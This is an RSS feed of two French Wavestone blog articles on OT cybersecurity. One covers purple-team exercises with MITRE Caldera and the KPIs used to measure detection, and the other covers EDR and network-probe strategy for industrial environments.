<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arnaud Soullié, Auteur</title>
	<atom:link href="https://www.riskinsight-wavestone.com/author/arnaud-soullie/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.riskinsight-wavestone.com/author/arnaud-soullie/</link>
	<description>Le blog cybersécurité des consultants Wavestone</description>
	<lastBuildDate>Wed, 10 Dec 2025 15:36:20 +0000</lastBuildDate>
	<language>fr-FR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/Blogs-2024_RI-39x39.png</url>
	<title>Arnaud Soullié, Auteur</title>
	<link>https://www.riskinsight-wavestone.com/author/arnaud-soullie/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Purple Teaming pour l’OT : Comment passer de la conformité à la performance ?</title>
		<link>https://www.riskinsight-wavestone.com/2025/12/purple-teaming-pour-lot-comment-passer-de-la-conformite-a-la-performance/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/12/purple-teaming-pour-lot-comment-passer-de-la-conformite-a-la-performance/#respond</comments>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Wed, 10 Dec 2025 15:36:18 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[IoT & smart products]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=28466</guid>

					<description><![CDATA[<p>Dans nos précédents articles de cette série sur la supervision cybersécurité OT (Quelle détection pour l’OT ? / Stratégie d’outillage), nous avons expliqué l’état actuel des capacités de détection OT et discuté de la bonne stratégie d’outillage. Ce troisième article se concentre sur...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/12/purple-teaming-pour-lot-comment-passer-de-la-conformite-a-la-performance/">Purple Teaming pour l’OT : Comment passer de la conformité à la performance ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><span data-contrast="auto">Dans nos précédents articles de cette série sur la supervision cybersécurité OT (</span><a href="https://www.riskinsight-wavestone.com/2025/09/quelle-detection-pour-lot-situation-actuelle-perspectives/"><span data-contrast="none">Quelle détection pour l’OT ?</span></a><span data-contrast="auto"> </span><span data-contrast="auto">/ </span><a href="https://www.riskinsight-wavestone.com/2025/10/strategie-doutillage-cybersecurite-pour-une-detection-industrielle-efficace/"><span data-contrast="none">Stratégie d’outillage</span></a><span data-contrast="auto">), nous avons expliqué l’état actuel des capacités de détection OT et discuté de la bonne stratégie d’outillage.</span> <br /><span data-contrast="auto">Ce troisième article se concentre sur une question clé : <strong>comment mesurer l’efficacité de votre détection OT ?</strong></span><strong> </strong></p>
<h1 aria-level="2">De la conformité à l’efficacité : un changement de paradigme dans les KPI </h1>
<p><span data-contrast="auto">KPI signifie </span><i><span data-contrast="auto">Key Performance Indicator</span></i><span data-contrast="auto"> (indicateur clé de performance). Cependant, nous avons tendance à créer des KPI pour suivre la progression par rapport à nos plans, non la performance réelle. Bien que cela soit utile, surveiller uniquement le déploiement ou la couverture (nombre de sites connectés au SOC, déploiement d’EDR sur les machines OT, nombre de sondes enregistrées sur la console de gestion) en dit très peu sur la capacité réelle de votre SOC à détecter un attaquant.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p><span data-contrast="auto">Alors, quel niveau de confiance avez-vous dans vos outils de détection, vos use cases et vos processus ? La seule façon d’en être sûr est simple : les tester. </span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p><span data-contrast="auto">Et le meilleur moyen de les tester est d’organiser des exercices de Purple Team.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<h1 aria-level="2">Qu’est-ce que le Purple Teaming en OT ? </h1>
<p><span data-contrast="auto">Un exercice de Purple Team est une mission collaborative entre la Red Team (attaquants) et la Blue Team (défenseurs). Contrairement à une évaluation Red Team classique, où les équipe de défense ne sont pas tenus informés, un exercice de Purple Team est un effort conjoint et itératif.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p><span data-contrast="auto">Cette approche collaborative permet aux deux équipes de :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Partager les hypothèses sur l’environnement OT</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Valider la logique de détection en temps réel</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Identifier les zones d’ombre</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Améliorer les playbooks et les pipelines de détection</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Aligner tout le monde sur un modèle de menace réaliste</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<h1 aria-level="2">Réaliser un exercice de Purple Team </h1>
<p><span data-contrast="auto">Un exercice Purple Team se déroule en trois grandes phases :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<h2>1. Préparation</h2>
<p><span data-contrast="auto">La phase de préparation est souvent la plus difficile, en particulier en OT, où la sureté de fonctionnement, la disponibilité de l’outil industriel et la dépendance aux fournisseurs doivent être prises en compte.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p><span data-contrast="auto">Selon la maturité de l’organisation, la préparation peut aller du très simple au très sophistiqué :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><strong>Tests unitaires </strong><br /><span data-contrast="auto">Petits tests isolés de règles de détection spécifiques (ex. : « Détecter le code fonction Modbus 90 »).</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Tests basés sur des scénarios redoutés</span></b> <br /><span data-contrast="auto">Construire des scénarios autour des « crown jewels » de l’organisation et des modes de défaillance (ex. : « Téléversement non autorisé d’un programme sur un automate contrôlant un procédé critique »).</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Tests enrichis par la CTI</span></b> <br /><span data-contrast="auto">Intégrer la Threat Intelligence : tester les techniques utilisées par de vrais attaquants ciblant l’OT (ex. TTP de Volt Typhoon, Sandworm, Xenotime ou de groupes ransomware visant les environnements industriels).</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">Pour structurer la phase de préparation, deux éléments sont essentiels :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><b><span data-contrast="auto">Une bonne connaissance de votre environnement OT</span></b> <br /><span data-contrast="auto">Planifier un exercice pertinent pour les risques métier et la détection OT, sans impacter le procédé, nécessite une connaissance approfondie du site et de son automatisation.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Un mapping sur la matrice </span></b><a href="https://attack.mitre.org/matrices/ics/"><b><span data-contrast="none">MITRE ATT&amp;CK for ICS</span></b></a> <br /><span data-contrast="auto">Mapper vos tests avec la matrice ATT&amp;CK vous donne un langage commun avec les équipes de détection. Cela permet de sélectionner les techniques pertinentes, d’éviter les angles morts et de garantir une couverture sur plusieurs couches : postes opérateurs, automates, IHM …</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<h2>2. Jour J (Exécution)</h2>
<p><span data-contrast="auto">L’exécution est réalisée conjointement :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">La Red Team lance des actions contrôlées et autorisées</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">La Blue Team surveille les évènements détectés en temps réel</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Les deux équipes ajustent, documentent et valident les résultats tout au long de l’exercice</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">Selon le périmètre et la complexité des tests, une opération Purple Team en milieu industriel peut durer de quelques heures à quelques jours.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<h3 aria-level="4"><i><span data-contrast="none">Assurer la reproductibilité des tests avec Caldera</span></i><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:40,&quot;335559739&quot;:0}"> </span></h3>
<p><span data-contrast="auto">Pour garantir la répétabilité et la cohérence entre les exercices Purple Team, l’automatisation devient essentielle. Nous utilisons </span><a href="https://www.mitre.org/resources/caldera-ot"><span data-contrast="none">Caldera</span></a><span data-contrast="auto">, un framework open-source de </span><i><span data-contrast="auto">Breach &amp; Attack Simulation</span></i><span data-contrast="auto"> (BAS) développé par MITRE pour cela.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p><span data-contrast="auto">En tant qu’ancien pentester, je n’ai jamais aimé le terme « pentest automatisé », mais les outils BAS sont ce qui se rapproche le plus d’une exécution de stimulis d’attaque répétable et sûre.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<h3><i><span data-contrast="none">Pourquoi utiliser Caldera plutôt que de réaliser tous les tests manuellement ?</span></i> </h3>
<p><span data-contrast="auto">Caldera permet de :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Préparer et valider une liste contrôlée de tests sur une liste contrôlée d’actifs</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">S’assurer que seules des actions autorisées sont exécutées</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Garantir la reproductibilité entre les environnements</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Rejouer exactement les mêmes actions pour mesurer les améliorations après des changements de configuration</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">Des plugins OT spécifiques existent déjà dans le module Caldera-OT, prenant en charge Modbus, Profinet, DNP3, etc.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p><span data-contrast="auto">Récemment, Wavestone a publié deux plugins OT supplémentaires :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Support du protocole Siemens S7</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Actions de communication OPC-UA</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<h3 aria-level="4"><i><span data-contrast="none">Caldera en bref</span></i><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:40,&quot;335559739&quot;:0}"> </span></h3>
<p><span data-contrast="auto">L’utilisation de Caldera repose sur quatre notions de base :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><b><span data-contrast="auto">Abilities</span></b><span data-contrast="auto"> : actions techniques atomiques (ex. lecture de coils, écriture de tags, scan d’un automate)</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Adversaries</span></b><span data-contrast="auto"> : collections d’abilities formant un scénario</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Operations</span></b><span data-contrast="auto"> : exécution en temps réel de ces adversaries sur une cible</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Fact sources</span></b><span data-contrast="auto"> : paramètres fournis pour une opération ; on peut ainsi lancer les mêmes opérations sur différents environnements en changeant seulement la source de facts</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">La vidéo suivante présente une démonstration de Caldera sur notre maquette ICS :</span> </p>
<div align="center"><iframe title="YouTube video player" src="//www.youtube.com/embed/wq8BMagjhwE" width="800" height="450" frameborder="0" allowfullscreen="allowfullscreen" data-mce-fragment="1"></iframe></div>
<div align="center"> </div>
<h2>3. Débriefing</h2>
<p><span data-contrast="auto">La majorité de la valeur ajoutée de l’exercice provient du debrief. Les types suivants de KPI peuvent être utilisés :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><b><span data-contrast="auto">Couverture de détection</span></b><span data-contrast="auto"> – quel pourcentage des stimuli exécutés a été détecté ?</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Qualité des alertes</span></b><span data-contrast="auto"> – les alertes étaient-elles exploitables, précises et compréhensibles ?</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Temps de réaction</span></b><span data-contrast="auto"> – combien de temps avant qu’une alerte soit déclenchée puis reconnue ?</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Efficacité des playbooks</span></b><span data-contrast="auto"> – les bonnes actions ont-elles été prises dans les délais attendus ?</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">Ces résultats peuvent permettre d’aboutir à :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Des règles de détection mises à jour</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Des playbooks SIEM/SOC améliorés</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Une meilleure architecture de supervision</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Du matériel de formation pour les analystes et ingénieurs</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<h1 aria-level="2">Commencez à tester dès maintenant ! </h1>
<p><span data-contrast="auto">Le Purple Teaming apporte une valeur immédiate, quel que soit votre niveau de maturité actuel :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Il valide vos outils dans des conditions réelles</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Il forme vos équipes SOC et OT</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Il révèle les angles morts tôt dans le programme</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Il fournit des KPI quantitatifs pour piloter les améliorations de détection</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">Et oui, cela est possible dans la plupart des environnements de production, sous les conditions suivantes :</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<ul>
<li><span data-contrast="auto">Périmètre strictement contrôlé</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Actions approuvées par les fournisseurs</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Pas d’exécution de fonctions perturbatrices</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Implication des équipes opérationnelles et sécurité</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
<li><span data-contrast="auto">Surveillance continue du comportement du système pendant les tests</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></li>
</ul>
<p><span data-contrast="auto">En bref : commencez petit, restez prudent, et itérez.</span><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p><b><span data-contrast="auto">N’attendez pas que votre programme de sécurité OT soit “terminé” pour commencer à en tester l’efficacité !</span></b><span data-ccp-props="{&quot;335559738&quot;:240,&quot;335559739&quot;:240}"> </span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/12/purple-teaming-pour-lot-comment-passer-de-la-conformite-a-la-performance/">Purple Teaming pour l’OT : Comment passer de la conformité à la performance ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/12/purple-teaming-pour-lot-comment-passer-de-la-conformite-a-la-performance/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>​​Stratégie d’outillage cybersécurité pour une détection industrielle efficace​</title>
		<link>https://www.riskinsight-wavestone.com/2025/10/strategie-doutillage-cybersecurite-pour-une-detection-industrielle-efficace/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/10/strategie-doutillage-cybersecurite-pour-une-detection-industrielle-efficace/#respond</comments>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Thu, 30 Oct 2025 10:01:14 +0000</pubDate>
				<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=28060</guid>

					<description><![CDATA[<p>Détection en environnement industriel Dans cet article précédent : Quelle détection pour l’OT ?  Situation actuelle &#38; perspectives, nous avons constaté que l’OT, bien que moins touché que l’IT, n&#8217;est pas exempt ni immunisée contre les cyberattaques. Toutefois, en raison...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/10/strategie-doutillage-cybersecurite-pour-une-detection-industrielle-efficace/">​​Stratégie d’outillage cybersécurité pour une détection industrielle efficace​</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<h1>Détection en environnement industriel</h1>
<p>Dans cet article précédent : <a href="https://www.riskinsight-wavestone.com/2025/09/quelle-detection-pour-lot-situation-actuelle-perspectives/">Quelle détection pour l’OT ?  Situation actuelle &amp; perspectives</a>, nous avons constaté que l’OT, bien que moins touché que l’IT, n&rsquo;est pas exempt ni immunisée contre les cyberattaques. Toutefois, en raison de la difficulté à mettre à jour les systèmes de contrôle industriels (ICS), les mesures de cybersécurité sont souvent ajoutées après le déploiement. Le monitoring continu est perçu comme un substitut pratique à une protection intégrée dès la conception (cyber-by-design).</p>
<p>En matière d&rsquo;outillage de monitoring, nous avons observé que 100 % de nos clients disposent d&rsquo;outils de détection déployés du côté IT. Cependant, seul un tiers étend cette surveillance jusqu&rsquo;aux couches inférieures de l&rsquo;environnement industriel :</p>
<p><img fetchpriority="high" decoding="async" class=" wp-image-28086 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR1.png" alt="" width="738" height="531" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR1.png 1060w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR1-266x191.png 266w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR1-54x39.png 54w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR1-768x552.png 768w" sizes="(max-width: 738px) 100vw, 738px" /></p>
<p>Il existe une grande variété de sources de détection permettant une surveillance (monitoring) à travers les différents niveaux du modèle Purdue :</p>
<ul>
<li>Logs de pare-feu (y compris industriels)</li>
<li>Logs des protection des endpoints (antivirus, whitelisting d’applications, EPP, EDR, etc.)</li>
<li>Logs d’authentification et d’accès (par exemple, Active Directory ou authentification locale)</li>
<li>Logs d’accès distant (par exemple, VPN, serveurs de rebond, bastion)</li>
<li>Les honeypots et autres</li>
<li>Sondes de détection et de surveillance réseau (écoute des réseaux industriels)</li>
<li>Logs des stations blanches (par exemple, bornes USB)</li>
<li>Logs industriels (provenant des systèmes SCADA, IHM, PLC… lorsqu’ils sont disponibles)</li>
</ul>
<p>Traditionnellement, peu de ces logs sont collectés et analysés par les solutions SIEM et/ou SOAR, avec ou sans modèles de détection OT spécifiques. Pourtant, ils devraient permettre à l&rsquo;équipe du SOC de détecter, d&rsquo;enquêter sur les événements de sécurité et d&rsquo;y répondre.</p>
<p>Élaborer une stratégie de détection cohérente pour les environnements OT ne nécessite pas de collecter les données de toutes les sources possibles. <span data-teams="true">En réalité, quelques sources bien choisies, <strong>correctement configurées, peuvent permettre d&rsquo;offrir une forte visibilité et de solides capacités de détection</strong>. L’essentiel est de se concentrer sur les sources de logs qui sont à la fois pertinentes au regard de l’architecture OT et facile à mettre en place sans perturber les opérations. Prioriser la qualité et la pertinence opérationnelle des sources de détection plutôt que leur quantité permet d&rsquo;assurer une posture de cybersécurité plus efficace et durable.</span></p>
<h1>Comment tirer le meilleur parti des sources de détection ?</h1>
<h2>Commencer avec les logs déjà disponibles</h2>
<p>Une approche pragmatique et rentable de la détection OT consiste <strong>à commencer par exploiter les logs et les modèles de détection déjà disponibles</strong> dans l&rsquo;environnement industriel, en particulier ceux qui sont déjà utilisés pour vos environnements IT. Par exemple, <strong>les logs des pares-feux</strong>, notamment ceux qui surveillent les périmètres IT/OT, peuvent fournir des informations précieuses sur les schémas de trafic réseau, les violations de segmentation ou les tentatives d&rsquo;accès <span data-teams="true">distant</span> suspectes. De même, les logs Active Directory (AD) peuvent révéler des comportements utilisateurs anormaux, des échecs d&rsquo;authentification ou des <span data-teams="true">élévations </span>de privilèges — tous étant des signaux critiques dans les contextes IT et OT. L&rsquo;exploitation de ces sources existantes permet aux organisations de mettre en place des capacités de détection initiales sans investissement lourd, tout en posant une base solide pour une surveillance plus avancée à l&rsquo;avenir.</p>
<p>Plutôt que de commencer par le déploiement d&rsquo;outils de détection complexes spécifiques à l&rsquo;OT, les organisations devraient <strong>construire leurs capacités de détection initiales en utilisant ce qui est déjà déployé, configuré et maîtrisé</strong>. Cette approche permet non seulement de réduire les coûts, mais aussi d&rsquo;accélérer la mise en œuvre sur l&rsquo;ensemble des sites industriels. L&rsquo;objectif est <strong>d&rsquo;assurer un niveau de visibilité de base cohérent</strong> sur les applications, les systèmes et les infrastructures critiques avant d&rsquo;approfondir la surveillance.</p>
<p>En commençant par l&rsquo;existant et en se concentrant sur <strong>la couverture plutôt que sur la complexité</strong>, les organisations peuvent aborder la détection OT avec rapidité, pertinence et réalisme opérationnel, tout en préparant le terrain pour des capacités plus avancées à l&rsquo;avenir.</p>
<p>Nous allons maintenant aller plus loin en nous concentrant sur les deux outils de détection les plus déployés et discutés dans les environnements industriels aujourd&rsquo;hui : les solutions EDR et les sondes de détection réseau.</p>
<h3>EDR</h3>
<p>Les solutions <strong>EDR (Endpoint Detection &amp; Response)</strong> offrent une surveillance et une analyse continues des activités des points de terminaison afin de détecter les cybermenaces, d&rsquo;y enquêter et d&rsquo;y répondre en temps réel. L&rsquo;EDR collecte des données détaillées telles que l&rsquo;exécution des processus, les modifications de fichiers, les connexions réseau et le comportement des utilisateurs. En s&rsquo;appuyant sur l&rsquo;analyse comportementale et les renseignements sur les menaces (<em>threat intelligence</em>), les outils EDR peuvent identifier des activités suspectes comme les infections par logiciels malveillants, les mouvements latéraux ou les <span data-teams="true">élévation</span>s de privilèges.</p>
<p><span data-teams="true">Cet outil de détection, largement utilisé dans les environnements IT, est désormais adopté par la majorité de nos clients pour un déploiement au sein de leurs environnements industriels.</span></p>
<p>Cependant, cela ne signifie pas que 100 % des dispositifs OT sont compatibles avec les solutions EDR. En réalité, la compatibilité des EDR varie considérablement selon la diversité des systèmes industriels et leurs contraintes opérationnelles. Le déploiement de l&rsquo;EDR est généralement simple aux niveaux supérieurs du modèle Purdue, tels que la Couche 3 et la Couche 3.5, où les systèmes (serveurs et postes de travail) ressemblent à des environnements IT traditionnels. À la Couche 2, l&rsquo;implémentation exige des tests approfondis et une personnalisation, car les dispositifs et les protocoles sont plus spécialisés et leurs ressources limitées. Enfin, aux niveaux les plus bas (contrôleurs, PLC et équipements de terrain), l&rsquo;EDR n&rsquo;est généralement pas viable en raison de leur capacité de traitement limitée, de leurs systèmes d&rsquo;exploitation propriétaires et de leurs exigences de performance en temps réel. Le déploiement sur de tels dispositifs risque de perturber les processus critiques ou de provoquer l&rsquo;instabilité du système, et doit donc être évité.</p>
<p><img decoding="async" class="size-full wp-image-28101 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR2-1.png" alt="" width="1252" height="492" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR2-1.png 1252w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR2-1-437x172.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR2-1-71x28.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/10/otprobe2_FR2-1-768x302.png 768w" sizes="(max-width: 1252px) 100vw, 1252px" /></p>
<p>Pour les environnements qui le supportent, l&rsquo;extension de la couverture EDR permet :</p>
<ul>
<li>Répondre à la faible maturité : Commencer par des outils plus simples à mettre en œuvre et nécessitant une maturité moindre.</li>
<li>Couverture étendue : Se concentrer sur la couverture rapide d&rsquo;un large éventail de systèmes, de sites et d&rsquo;applications critiques.</li>
<li>Exploiter les outils IT : Utiliser des solutions basées sur la IT, comme l&rsquo;EDR, pour une détection efficace sans nécessiter de lourdes exigences d&rsquo;infrastructure.</li>
</ul>
<p><span data-teams="true">Pour conclure,<strong> le déploiement d’agents EDR sur les serveurs et les postes de travail OT</strong> devient de plus en plus pertinent et représente une possibilité de <strong>gain rapide pour la détection OT</strong>, selon les retours de nos clients.</span></p>
<h3>Les Sondes de Détection OT</h3>
<p>Une sonde de détection (<a href="https://www.riskinsight-wavestone.com/2024/10/sondes-de-detection-pour-lot-les-cles-pour-reussir-son-deploiement/">detection probe</a>) est un équipement, qu&rsquo;il soit virtuel ou physique, connecté au système d&rsquo;information afin de le cartographier et de le surveiller. Elle est composée de capteurs distribués à travers le réseau pour collecter des données, et typiquement, d&rsquo;une console centrale pour agréger, corréler et analyser ces informations.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-24245 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/10/Capture-decran-2024-10-16-094247.png" alt="" width="1279" height="245" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2024/10/Capture-decran-2024-10-16-094247.png 1279w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/10/Capture-decran-2024-10-16-094247-437x84.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/10/Capture-decran-2024-10-16-094247-71x14.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2024/10/Capture-decran-2024-10-16-094247-768x147.png 768w" sizes="auto, (max-width: 1279px) 100vw, 1279px" /></p>
<p> Les sondes destinées aux environnements industriels, que nous appellerons ici simplement sondes OT, se caractérisent par leur écoute passive et non invasive sur le réseau, ainsi que par leur compréhension des protocoles et comportements industriels. Toutes ces solutions de sondes fonctionnent sur le même principe : le trafic réseau est collecté via une duplication de flux (SPAN, ERSPAN&#8230;) ou un duplicateur physique (Taps, etc.). Les paquets sont inspectés en temps réel pour fournir plusieurs types de données : inventaire et cartographie des flux, gestion des actifs et des vulnérabilités, et enfin, détection des anomalies et des incidents. Ce sont précisément les larges capacités de détection promises ainsi que la variété des cas d&rsquo;usage possibles de ces données et des types d&rsquo;utilisateurs impliqués (équipes opérationnelles et métiers, équipes de cybersécurité, etc.) qui rendent les sondes OT si populaires.</p>
<p>Cependant, nos clients sont souvent confrontés à <strong>des défis importants lorsqu&rsquo;il s&rsquo;agit de déployer</strong> ces sondes à grande échelle et de les exploiter efficacement pour la détection sur l&rsquo;ensemble des réseaux industriels.</p>
